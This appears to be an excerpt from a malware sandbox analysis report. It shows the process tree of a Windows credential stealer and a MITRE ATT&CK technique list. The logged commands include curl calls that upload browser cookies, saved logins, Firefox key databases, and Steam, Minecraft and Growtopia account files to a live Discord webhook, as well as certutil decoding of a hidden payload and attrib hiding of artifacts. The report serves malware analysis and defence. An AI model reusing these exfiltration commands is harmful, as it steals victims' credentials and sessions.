curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2240

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3888

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
- Delays execution with timeout.exe
PID:5456

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Shortcuts" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5216

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Bookmarks" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5968

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Login Data" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4956

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:2492

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- FIREFOX // from Admin - 10.127.0.105 @ 12:32:45.19```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles"
4⤵
PID:1980

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\logins.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5672

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
- Delays execution with timeout.exe
PID:2924

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\key3.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1648

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\key4.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4924

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\cookies.sqlite" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1928

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:5864

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\logins.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:6116

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:1164

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\key3.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3756

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\key4.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4892

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\cookies.sqlite" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:6100

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
- Delays execution with timeout.exe
PID:5224

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- osu! // from Admin - 10.127.0.105 @ 12:32:52.14```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3440

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Local\osu!\osu!.Admin.cfwh
4⤵
PID:3268

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- DISCORD // from Admin - 10.127.0.105 @ 12:32:52.63```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\discord\Local Storage\leveldb\"
4⤵
PID:1684

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- STEAM // from Admin - 10.127.0.105 @ 12:32:53.02```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3652

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F steamusers=@"C:\Program Files (x86)\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5576

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F loginusers=@"C:\Program Files\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files (x86)\Steam\"
4⤵
PID:3164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files\Steam\"
4⤵
PID:3648

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- MINECRAFT // from Admin - 10.127.0.105 @ 12:32:53.68```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5196

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_profiles.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3688

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:6116

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
- Delays execution with timeout.exe
PID:3252

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- GROWTOPIA // from Admin - 10.127.0.105 @ 12:32:55.21```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1840

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F save.dat=@"C:\Users\Admin\AppData\Local\Growtopia\save.dat" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1648

C:\Windows\system32\attrib.exe
Attrib +h +s Do_Not_Delete..file
4⤵
PID:2308

C:\Windows\system32\certutil.exe
certutil -decode Do_Not_Delete..file System.exe
4⤵
PID:4228

C:\Windows\system32\timeout.exe
timeout 2 /nobreak
4⤵
PID:116

C:\Windows\system32\attrib.exe
Attrib +h +s System.exe
4⤵
PID:5568

C:\Windows\system32\attrib.exe
Attrib -h -s Do_Not_Delete..file
4⤵
PID:5976

C:\Windows\system32\mode.com
mode con cols=150 lines=30
4⤵
PID:6080

C:\Windows\system32\attrib.exe
attrib -h -s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:1884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.jpg
4⤵
PID:3692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.mp3
4⤵
PID:5732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.mp4
4⤵
PID:4704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.gif
4⤵
PID:3060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.txt
4⤵
PID:2076

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2060

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4424

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6052

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1684

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5996

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4316

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2448

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3660

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5932

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1928

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2292

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3888

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2660

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3508

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:116

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5568

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5976

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6140

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6100

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1884

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4528

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5732

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3688

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4704

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4976

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1660

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4480

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2076

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3440

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2960

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6052

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:868

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3412

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5836

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4964

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5576

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5248

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
- Views/modifies file attributes
PID:4296

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4892

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5864

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:896

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5004

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5356

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6096

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6104

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3832

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3692

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2720

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4976

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1660

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5736

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2060

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4500

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4828

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3916

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4316

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.png
4⤵
PID:3292

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5424

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4456

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5476

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4460

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3628

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2172

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5864

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=8968,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7844 /prefetch:8
1⤵
PID:2292

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Create or Modify System Process

T1543

Windows Service

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery